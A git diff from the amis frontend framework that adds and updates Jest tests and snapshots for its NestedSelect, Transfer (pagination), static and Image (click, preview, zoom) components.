<div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-19" - > - label-19 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="9" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - </div> - </div> - </div> - </div> - </div> - </div> - </form> - </div> - <div - class="cxd-Panel-footerWrap" - > - <div - class="cxd-Panel-btnToolbar cxd-Panel-footer" - > - <button - class="cxd-Button cxd-Button--primary cxd-Button--size-default" - type="submit" - > - <span> - 提交 - </span> - </button> - </div> - </div> - </div> -</div> -`; - -exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` -<div> - <div - class="cxd-Panel cxd-Panel--default cxd-Panel--form" - > - <div - class="cxd-Panel-heading" - > - <h3 - class="cxd-Panel-title" - > - <span - class="cxd-TplField" - > - <span> - 表单 - </span> - </span> - </h3> - </div> - <div - class="cxd-Panel-body" - > - <form - class="cxd-Form cxd-Form--normal" - novalidate="" - > - <input - style="display: none;" - type="submit" - /> - <div - class="cxd-Form-item cxd-Form-item--normal" - data-role="form-item" - > - <label - class="cxd-Form-label" - > - <span> - <span - class="cxd-TplField" - > - <span> - 分组 - </span> - </span> - </span> - </label> - <div - class="cxd-TransferControl cxd-Form-control" - > - <div - class="cxd-Transfer" - > - <div - class="cxd-Transfer-select" - > - <div - class="cxd-Transfer-title cxd-Transfer-title--light" - > - <span> - 可选项 - <span> - ( - 189 - / - 200 - ) - </span> - </span> - </div> - <div - class="cxd-TableSelection cxd-Transfer-selection" - > - <div - class="cxd-Table-content is-virtual" - > - <table - class="cxd-Table-table" - > - <thead> - <tr> - <th - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - 
class="" - /> - </label> - </th> - <th> - 名称 - </th> - <th> - 值 - </th> - </tr> - </thead> - </table> - <div - class="cxd-Table-content-virtual" - > - <div - style="display: block; position: relative; width: 100%; height: 100%;" - > - <div - style="overflow: auto; will-change: transform; height: 0px; width: 100%;" - > - <table - class="cxd-Table-table" - style="margin-top: 0px;" - > - <colgroup> - <col - style="width: 0px;" - /> - <col - style="width: 0px;" - /> - <col - style="width: 0px;" - /> - </colgroup> - <tbody> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-1 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 1 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-2 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 2 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-3 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 3 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox 
cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-4 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 4 - </span> - </td> - </tr> - </tbody> - </table> - <div - style="position: absolute; width: 1px; white-space: nowrap; min-height: 100%; height: 6400px; top: 0px; visibility: hidden;" - /> - </div> - <div - class="resize-sensor" - style="position: absolute; left: 0px; top: 0px; right: 0px; bottom: 0px; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - class="resize-sensor-expand" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0px; top: 0px; width: 10px; height: 10px;" - /> - - - </div> - - - <div - class="resize-sensor-shrink" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0; top: 0; width: 200%; height: 200%" - /> - - - </div> - - - <div - class="resize-sensor-appear" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;animation-name: apearSensor; animation-duration: 0.2s;" - /> - </div> - </div> - </div> - </div> - </div> - </div> - <div - class="cxd-Transfer-mid" - /> - <div - class="cxd-Transfer-result" - > - <div - class="cxd-Transfer-title cxd-Transfer-title--light" - > - <span> - 已选项 - <span> - ( - 11 - ) - </span> - </span> - <a - class="cxd-Transfer-clearAll" - > - 清空 - </a> - </div> - <div - class="cxd-Selections cxd-Transfer-value" - > - <div - class="cxd-Selections-items" - > - <div - style="display: block; position: relative; width: 100%; height: 100%;" - > - <div - style="overflow: auto; will-change: transform; height: 0px; width: 100%;" - > - 
<div - style="position: relative; width: auto; white-space: nowrap; min-height: 100%; height: 352px;" - > - <div - class="cxd-Selections-item" - style="position: absolute; top: 0px; left: 0px; width: 100%; height: 32px;" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-1" - > - label-1 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="0" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - style="position: absolute; top: 32px; left: 0px; width: 100%; height: 32px;" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-3" - > - label-3 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="1" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - style="position: absolute; top: 64px; left: 0px; width: 100%; height: 32px;" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-5" - > - label-5 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="2" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - style="position: absolute; top: 96px; left: 0px; width: 100%; height: 32px;" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-7" - > - label-7 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="3" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - </div> - </div> - <div - class="resize-sensor" - style="position: absolute; left: 0px; top: 0px; right: 0px; bottom: 0px; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - class="resize-sensor-expand" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; 
overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0px; top: 0px; width: 10px; height: 10px;" - /> - - - </div> - - - <div - class="resize-sensor-shrink" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0; top: 0; width: 200%; height: 200%" - /> - - - </div> - - - <div - class="resize-sensor-appear" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;animation-name: apearSensor; animation-duration: 0.2s;" - /> - </div> - </div> - </div> - </div> - </div> - </div> - </div> - </div> - </form> - </div> - <div - class="cxd-Panel-footerWrap" - > - <div - class="cxd-Panel-btnToolbar cxd-Panel-footer" - > - <button - class="cxd-Button cxd-Button--primary cxd-Button--size-default" - type="submit" - > - <span> - 提交 - </span> - </button> - </div> - </div> - </div> -</div> -`; - exports[`Renderer:transfer tree 1`] = ` <div> <div diff --git a/packages/amis/__tests__/renderers/Form/nestedSelect.test.tsx b/packages/amis/__tests__/renderers/Form/nestedSelect.test.tsx index 559e3a0aa..791a4e963 100644 --- a/packages/amis/__tests__/renderers/Form/nestedSelect.test.tsx +++ b/packages/amis/__tests__/renderers/Form/nestedSelect.test.tsx @@ -2,12 +2,13 @@ * 组件名称:NestedSelect 级联选择器 * 单测内容: * 01. maxTagLength + * 02. 
onlyLeaf */ -import {render, cleanup, waitFor} from '@testing-library/react'; +import {render, cleanup, waitFor, fireEvent} from '@testing-library/react'; import '../../../src'; import {render as amisRender} from '../../../src'; -import {makeEnv} from '../../helper'; +import {makeEnv, wait} from '../../helper'; import {clearStoresCache} from '../../../src'; afterEach(() => { @@ -113,3 +114,107 @@ describe('Renderer:NestedSelect', () => { expect(container).toMatchSnapshot(); }); }); + + +describe.only('Renderer:NestedSelect with onlyLeaf', () => { + test('single selection', async () => { + const optionWithNoChild = 'OptionWithNoChild'; + const optionWithChild = 'OptionWithChild'; + const {container, queryByText} = await setupNestedSelect({ + "onlyLeaf": true, + "options": [ + {"label": "选项A", "value": "A"}, + {"label": optionWithNoChild, "value": "B", "children": []}, + { + "label": optionWithChild, + "value": "C", + "children": [ + {"label": "选项c1", "value": "c1"}, + {"label": "选项c2", "value": "c2"} + ] + } + ] + }); + + const trigger = container.querySelector('.cxd-ResultBox'); + expect(trigger).toBeInTheDocument(); + + + fireEvent.click(trigger!); + await wait(200); + + const parentNum = container.querySelectorAll('.cxd-NestedSelect-optionArrowRight')?.length ?? 
0; + expect(parentNum).toEqual(1); + + let options = container.querySelectorAll('.cxd-NestedSelect-optionLabel'); + expect(options.length).toEqual(3); + + /** onlyLeaf开启后,children为空数组的选项也可以选择 */ + fireEvent.click(options[1]); + await wait(300); + expect(queryByText(optionWithNoChild)!).toBeInTheDocument(); + + fireEvent.click(trigger!); + await wait(200); + options = container.querySelectorAll('.cxd-NestedSelect-optionLabel'); + fireEvent.click(options[2]); + await wait(300); + fireEvent.click(trigger!); + await wait(200); + expect(queryByText(optionWithNoChild)!).toBeInTheDocument(); + /** onlyLeaf开启后,children非空的选项无法选择 */ + expect(queryByText(optionWithChild)).toBeNull(); + }); + + test('single selection', async () => { + const optionWithNoChild = 'OptionWithNoChild'; + const optionWithChild = 'OptionWithChild'; + const {container, queryByText} = await setupNestedSelect({ + "onlyLeaf": true, + "multiple": true, + "options": [ + {"label": "选项A", "value": "A"}, + {"label": optionWithNoChild, "value": "B", "children": []}, + { + "label": optionWithChild, + "value": "C", + "children": [ + {"label": "选项c1", "value": "c1"}, + {"label": "选项c2", "value": "c2"} + ] + } + ] + }); + + const trigger = container.querySelector('.cxd-ResultBox'); + expect(trigger).toBeInTheDocument(); + + + fireEvent.click(trigger!); + await wait(200); + + const parentNum = container.querySelectorAll('.cxd-NestedSelect-optionArrowRight')?.length ?? 
0; + expect(parentNum).toEqual(1); + + let options = container.querySelectorAll('.cxd-NestedSelect-optionLabel'); + expect(options.length).toEqual(3); + + /** onlyLeaf开启后,children为空数组的选项也可以选择 */ + fireEvent.click(options[1]); + await wait(300); + fireEvent.click(trigger!); + await wait(200); + expect(queryByText(optionWithNoChild)!).toBeInTheDocument(); + + fireEvent.click(trigger!); + await wait(200); + options = container.querySelectorAll('.cxd-NestedSelect-optionLabel'); + fireEvent.click(options[2]); + await wait(300); + fireEvent.click(trigger!); + await wait(200); + expect(queryByText(optionWithNoChild)!).toBeInTheDocument(); + /** onlyLeaf开启后,children非空的选项无法选择 */ + expect(queryByText(optionWithChild)).toBeNull(); + }); +}); diff --git a/packages/amis/__tests__/renderers/Form/static.test.tsx b/packages/amis/__tests__/renderers/Form/static.test.tsx index cc8f69022..c1e761c45 100644 --- a/packages/amis/__tests__/renderers/Form/static.test.tsx +++ b/packages/amis/__tests__/renderers/Form/static.test.tsx @@ -66,7 +66,7 @@ test('Renderer:static', async () => { expect(container).toMatchSnapshot(); }); -test('Renderer:static', async () => { +test('Renderer:static2', async () => { const {container} = render( amisRender( { @@ -189,3 +189,39 @@ test('Renderer:staticOn', async () => { const text = getByText('123'); expect(text).toBeInTheDocument(); }); + +test('Renderer:staticInColumn', async () => { + const {container, getByText} = render( + amisRender( + { + type: 'crud', + source: '${items}', + columns: [ + { + type: 'input-text', + name: 'a', + label: 'a', + static: true, + quickEdit: { + type: 'input-text', + mode: 'inline' + } + } + ], + submitText: null, + actions: [] + }, + { + data: { + items: [{a: '1'}] + } + }, + makeEnv() + ) + ); + + await wait(200); + + expect(container.querySelector('input[name="a"]')).toBeInTheDocument(); + expect((container.querySelector('input[name="a"]') as any).value).toBe('1'); +}); diff --git 
a/packages/amis/__tests__/renderers/Form/transfer.test.tsx b/packages/amis/__tests__/renderers/Form/transfer.test.tsx index ad9b6abfa..2fa5f0ed1 100644 --- a/packages/amis/__tests__/renderers/Form/transfer.test.tsx +++ b/packages/amis/__tests__/renderers/Form/transfer.test.tsx @@ -1392,7 +1392,6 @@ test('Renderer:transfer search highlight', async () => { }); test('Renderer:transfer tree search', async () => { - const onSubmit = jest.fn(); const {container, findByText, getByText} = render( amisRender( @@ -1486,7 +1485,7 @@ test('Renderer:transfer tree search', async () => { }); await(300); - + const libai = getByText('李白'); expect(libai).not.toBeNull(); fireEvent.click(libai); @@ -1501,4 +1500,310 @@ test('Renderer:transfer tree search', async () => { expect(onSubmit.mock.calls[0][0]).toEqual({ transfer: "caocao,libai" }); -}); \ No newline at end of file +}); + +test('Renderer:Transfer with pagination', async () => { + const mockData = [ + { + "label": "Laura Lewis", + "value": "1" + }, + { + "label": "David Gonzalez", + "value": "2" + }, + { + "label": "Christopher Rodriguez", + "value": "3" + }, + { + "label": "Sarah Young", + "value": "4" + }, + { + "label": "James Jones", + "value": "5" + }, + { + "label": "Larry Robinson", + "value": "6" + }, + { + "label": "Christopher Perez", + "value": "7" + }, + { + "label": "Sharon Davis", + "value": "8" + }, + { + "label": "Kenneth Anderson", + "value": "9" + }, + { + "label": "Deborah Lewis", + "value": "10" + }, + { + "label": "Jennifer Lewis", + "value": "11" + }, + { + "label": "Laura Miller", + "value": "12" + }, + { + "label": "Larry Harris", + "value": "13" + }, + { + "label": "Patricia Robinson", + "value": "14" + }, + { + "label": "Mark Davis", + "value": "15" + }, + { + "label": "Jessica Harris", + "value": "16" + }, + { + "label": "Anna Brown", + "value": "17" + }, + { + "label": "Lisa Young", + "value": "18" + }, + { + "label": "Donna Williams", + "value": "19" + }, + { + "label": "Shirley Davis", + "value": 
"20" + } + ]; + const fetcher = jest.fn().mockImplementation((api) => { + const perPage = 10; /** 锁死10个方便测试 */ + const page = Number(api.query.page || 1); + + return Promise.resolve({ + data: { + status: 0, + msg: 'ok', + data: { + count: mockData.length, + page: page, + items: mockData.concat().splice((page - 1) * perPage, perPage) + } + } + }); + }); + const {container} = render( + amisRender( + { + "type": "form", + "debug": true, + "body": [ + { + "label": "默认", + "type": "transfer", + "name": "transfer", + "joinValues": false, + "extractValue": false, + "source": "/api/mock2/options/transfer?page=${page}&perPage=${perPage}", + "pagination": { + "enable": true, + "layout": ["pager", "perpage", "total"], + "popOverContainerSelector": ".cxd-Panel--form" + }, + "value": [ + {"label": "Laura Lewis", "value": "1", id: 1}, + {"label": "Christopher Rodriguez", "value": "3", id: 3}, + {"label": "Laura Miller", "value": "12", id: 12}, + {"label": "Patricia Robinson", "value": "14", id: 14} + ] + } + ] + }, {}, makeEnv({fetcher}))); + + await wait(500); + expect(container.querySelector('.cxd-Transfer-footer-pagination')).toBeInTheDocument(); + + const checkboxes = container.querySelectorAll('input[type=checkbox]')!; + expect(checkboxes.length).toEqual(11); /** 包括顶部全选 */ + expect((checkboxes[1] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes[2] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes[3] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes[4] as HTMLInputElement)?.checked).toEqual(false); + + const nextBtn = container.querySelector('.cxd-Pagination-next')!; + fireEvent.click(nextBtn); + await wait(500); + + const checkboxes2 = container.querySelectorAll('input[type=checkbox]')!; + expect(checkboxes2.length).toEqual(11); + expect((checkboxes2[1] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes2[2] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes2[3] as 
HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes2[4] as HTMLInputElement)?.checked).toEqual(true); +}) + +test.only('Renderer:Transfer with pagination and data source from data scope', async () => { + const mockData = [ + { + "label": "Laura Lewis", + "value": "1" + }, + { + "label": "David Gonzalez", + "value": "2" + }, + { + "label": "Christopher Rodriguez", + "value": "3" + }, + { + "label": "Sarah Young", + "value": "4" + }, + { + "label": "James Jones", + "value": "5" + }, + { + "label": "Larry Robinson", + "value": "6" + }, + { + "label": "Christopher Perez", + "value": "7" + }, + { + "label": "Sharon Davis", + "value": "8" + }, + { + "label": "Kenneth Anderson", + "value": "9" + }, + { + "label": "Deborah Lewis", + "value": "10" + }, + { + "label": "Jennifer Lewis", + "value": "11" + }, + { + "label": "Laura Miller", + "value": "12" + }, + { + "label": "Larry Harris", + "value": "13" + }, + { + "label": "Patricia Robinson", + "value": "14" + }, + { + "label": "Mark Davis", + "value": "15" + }, + { + "label": "Jessica Harris", + "value": "16" + }, + { + "label": "Anna Brown", + "value": "17" + }, + { + "label": "Lisa Young", + "value": "18" + }, + { + "label": "Donna Williams", + "value": "19" + }, + { + "label": "Shirley Davis", + "value": "20" + } + ]; + const fetcher = jest.fn().mockImplementation((api) => { + return Promise.resolve({ + data: { + status: 0, + msg: 'ok', + data: { + count: mockData.length, + items: mockData + } + } + }); + }); + const {container} = render( + amisRender( + { + "type": "form", + "debug": true, + "body": [ + { + "type": "service", + "api": { + "url": "/api/mock2/options/loadDataOnce", + "method": "get", + "responseData": { + "transferOptions": "${items}" + } + }, + body: [ + { + "label": "默认", + "type": "transfer", + "name": "transfer", + "joinValues": false, + "extractValue": false, + "source": "${transferOptions}", + "pagination": { + "enable": true, + "layout": ["pager", "perpage", "total"], + 
"popOverContainerSelector": ".cxd-Panel--form" + }, + "value": [ + {"label": "Laura Lewis", "value": "1", id: 1}, + {"label": "Christopher Rodriguez", "value": "3", id: 3}, + {"label": "Laura Miller", "value": "12", id: 12}, + {"label": "Patricia Robinson", "value": "14", id: 14} + ] + } + ] + } + ] + }, {}, makeEnv({fetcher}))); + + await wait(500); + expect(container.querySelector('.cxd-Transfer-footer-pagination')).toBeInTheDocument(); + + const checkboxes = container.querySelectorAll('input[type=checkbox]')!; + expect(checkboxes.length).toEqual(11); /** 包括顶部全选 */ + expect((checkboxes[1] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes[2] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes[3] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes[4] as HTMLInputElement)?.checked).toEqual(false); + + const nextBtn = container.querySelector('.cxd-Pagination-next')!; + fireEvent.click(nextBtn); + await wait(500); + + const checkboxes2 = container.querySelectorAll('input[type=checkbox]')!; + expect(checkboxes2.length).toEqual(11); + expect((checkboxes2[1] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes2[2] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes2[3] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes2[4] as HTMLInputElement)?.checked).toEqual(true); +}) diff --git a/packages/amis/__tests__/renderers/Image.test.tsx b/packages/amis/__tests__/renderers/Image.test.tsx index 45192f014..8fe8757ee 100644 --- a/packages/amis/__tests__/renderers/Image.test.tsx +++ b/packages/amis/__tests__/renderers/Image.test.tsx @@ -12,6 +12,10 @@ * 9. href * 10. 作为表单项 * 11. clickAction + * 12. click事件 + * 13. mouseenter / mouseleave 事件 + * 14. preview 预览动作 + * 15. zoom & maxScale & minScale 调整图片比例动作 * * * 组件名称:Images 图片集 * 内容说明:images 与 image 使用组件相同,相同属性不重复测试了 @@ -20,7 +24,7 @@ * 2. 
enlargeAble & originalSrc & source & title & description */ -import {fireEvent, render} from '@testing-library/react'; +import {fireEvent, render, waitFor} from '@testing-library/react'; import '../../src'; import {render as amisRender} from '../../src'; import {makeEnv, wait} from '../helper'; @@ -334,7 +338,228 @@ describe('Renderer:image', () => { }) ); fireEvent.click(container.querySelector('.cxd-Image-thumbWrap')!); - expect(getByText('这是一个弹框')!).toBeInTheDocument(); + await waitFor(() => { + expect(getByText('这是一个弹框')!).toBeInTheDocument(); + }); + }); + + test('image:click', async () => { + const notify = jest.fn(); + const {container, getByText} = render( + amisRender( + { + type: 'image', + src: 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80', + class: 'cursor-pointer', + onEvent: { + click: { + actions: [ + { + actionType: 'toast', + args: { + msgType: 'info', + msg: '派发点击事件' + } + } + ] + }, + mouseenter: { + actions: [ + { + actionType: 'toast', + args: { + msgType: 'info', + msg: '派发鼠标移入事件' + } + } + ] + }, + mouseleave: { + actions: [ + { + actionType: 'toast', + args: { + msgType: 'info', + msg: '派发鼠标移出事件' + } + } + ] + } + } + }, + {}, + makeEnv({ + notify, + session: 'image-test-action-1' + }) + ) + ); + fireEvent.click(container.querySelector('.cxd-Image-thumbWrap')!); + await waitFor(() => { + expect(notify).toHaveBeenCalledWith('info', '派发点击事件', { + msg: '派发点击事件', + msgType: 'info' + }); + }); + fireEvent.mouseEnter(container.querySelector('.cxd-Image-thumbWrap')!); + await waitFor(() => { + expect(notify).toHaveBeenCalledWith('info', '派发鼠标移入事件', { + msg: '派发鼠标移入事件', + msgType: 'info' + }); + }); + fireEvent.mouseLeave(container.querySelector('.cxd-Image-thumbWrap')!); + await waitFor(() => { + expect(notify).toHaveBeenCalledWith('info', '派发鼠标移出事件', { + msg: '派发鼠标移出事件', + msgType: 'info' + }); + }); + }); + + test('image:preview 预览动作', async () => { + const {container, getByText, 
baseElement} = render( + amisRender({ + type: 'page', + body: [ + { + type: 'image', + id: 'previewImage', + src: 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80', + originalSrc: + 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg' + }, + { + type: 'button', + label: '预览图片', + onEvent: { + click: { + actions: [ + { + actionType: 'preview', + componentId: 'previewImage' + } + ] + } + } + } + ] + }) + ); + expect(container).toMatchSnapshot(); + fireEvent.click(getByText('预览图片')); + expect(baseElement.querySelector('.cxd-ImageGallery')!).toBeInTheDocument(); + expect( + baseElement.querySelector('.cxd-ImageGallery .cxd-ImageGallery-main img')! + ).toHaveAttribute( + 'src', + 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg' + ); + }); + + test('image:zoom & maxScale & minScale 调整图片比例动作', async () => { + const {container, getByText, baseElement} = render( + amisRender({ + type: 'page', + body: [ + { + type: 'image', + id: 'zoomImage', + src: 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80', + originalSrc: + 'https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg', + maxScale: 200, + minScale: 20 + }, + { + type: 'button', + label: '放大图片', + onEvent: { + click: { + actions: [ + { + actionType: 'zoom', + args: { + scale: 50 + }, + componentId: 'zoomImage' + } + ] + } + } + }, + { + type: 'button', + label: '缩小图片', + onEvent: { + click: { + actions: [ + { + actionType: 'zoom', + args: { + scale: -50 + }, + componentId: 'zoomImage' + } + ] + } + } + } + ] + }) + ); + expect(container).toMatchSnapshot(); + + const imgIns = baseElement.querySelector('.cxd-ImageField--thumb')!; + expect(imgIns).toHaveStyle({ + transform: 'scale(1)' + }); + + fireEvent.click(getByText('放大图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + 
transform: 'scale(1.5)' + }); + }); + + fireEvent.click(getByText('缩小图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(1)' + }); + }); + + fireEvent.click(getByText('放大图片')); + fireEvent.click(getByText('放大图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(2)' + }); + }); + + fireEvent.click(getByText('放大图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(2)' + }); + }); + + fireEvent.click(getByText('缩小图片')); + fireEvent.click(getByText('缩小图片')); + fireEvent.click(getByText('缩小图片')); + fireEvent.click(getByText('缩小图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(0.2)' + }); + }); + + fireEvent.click(getByText('缩小图片')); + await waitFor(() => { + expect(imgIns).toHaveStyle({ + transform: 'scale(0.2)' + }); + }); }); }); diff --git a/packages/amis/__tests__/renderers/__snapshots__/Image.test.tsx.snap b/packages/amis/__tests__/renderers/__snapshots__/Image.test.tsx.snap index 5644d719b..db441d13c 100644 --- a/packages/amis/__tests__/renderers/__snapshots__/Image.test.tsx.snap +++ b/packages/amis/__tests__/renderers/__snapshots__/Image.test.tsx.snap @@ -56,6 +56,7 @@ exports[`Renderer:image image as form item 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb no-border" @@ -103,6 +104,7 @@ exports[`Renderer:image image:basic 1`] = ` <div> <div class="cxd-ImageField cxd-ImageField--thumb show" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -138,6 +140,7 @@ exports[`Renderer:image image:enlargeAble & originalSrc & enlargeTitle & showToo <div> <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -178,6 +181,7 @@ exports[`Renderer:image image:enlargeAble & originalSrc & enlargeTitle & showToo <div> <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: 
scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -231,6 +235,7 @@ exports[`Renderer:image image:href 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <a class="cxd-Link" @@ -263,10 +268,62 @@ exports[`Renderer:image image:href 1`] = ` </div> `; +exports[`Renderer:image image:preview 预览动作 1`] = ` +<div> + <div + class="cxd-Page" + > + <div + class="cxd-Page-content" + > + <div + class="cxd-Page-main" + > + <div + class="cxd-Page-body" + role="page-body" + > + <div + class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" + > + <div + class="cxd-Image cxd-Image--thumb" + > + <div + class="cxd-Image-thumbWrap" + > + <div + class="cxd-Image-thumb cxd-Image-thumb--contain cxd-Image-thumb--1-1" + > + <img + class="cxd-Image-image" + src="https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80" + /> + </div> + </div> + </div> + </div> + <button + class="cxd-Button cxd-Button--default cxd-Button--size-default" + type="button" + > + <span> + 预览图片 + </span> + </button> + </div> + </div> + </div> + </div> +</div> +`; + exports[`Renderer:image image:title & imageCaption 1`] = ` <div> <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -308,6 +365,7 @@ exports[`Renderer:image image:width & height 1`] = ` <div> <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -330,6 +388,65 @@ exports[`Renderer:image image:width & height 1`] = ` </div> `; +exports[`Renderer:image image:zoom & maxScale & minScale 调整图片比例动作 1`] = ` +<div> + <div + class="cxd-Page" + > + <div + class="cxd-Page-content" + > + <div + class="cxd-Page-main" + > + <div + class="cxd-Page-body" + role="page-body" + > + <div + class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" + > + <div + class="cxd-Image cxd-Image--thumb" + 
> + <div + class="cxd-Image-thumbWrap" + > + <div + class="cxd-Image-thumb cxd-Image-thumb--contain cxd-Image-thumb--1-1" + > + <img + class="cxd-Image-image" + src="https://internal-amis-res.cdn.bcebos.com/images/2020-1/1578395692722/4f3cb4202335.jpeg@s_0,w_216,l_1,f_jpg,q_80" + /> + </div> + </div> + </div> + </div> + <button + class="cxd-Button cxd-Button--default cxd-Button--size-default" + type="button" + > + <span> + 放大图片 + </span> + </button> + <button + class="cxd-Button cxd-Button--default cxd-Button--size-default" + type="button" + > + <span> + 缩小图片 + </span> + </button> + </div> + </div> + </div> + </div> +</div> +`; + exports[`Renderer:images images:basic 1`] = ` <div> <div diff --git a/packages/amis/__tests__/renderers/__snapshots__/Table.test.tsx.snap b/packages/amis/__tests__/renderers/__snapshots__/Table.test.tsx.snap index f12dfcf5d..03dcd4b28 100644 --- a/packages/amis/__tests__/renderers/__snapshots__/Table.test.tsx.snap +++ b/packages/amis/__tests__/renderers/__snapshots__/Table.test.tsx.snap @@ -7090,6 +7090,7 @@ exports[`Renderer:table list 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -7331,6 +7332,7 @@ exports[`Renderer:table list 1`] = ` > <div class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb" @@ -7692,6 +7694,7 @@ exports[`Renderer:table list 1`] = ` > <div 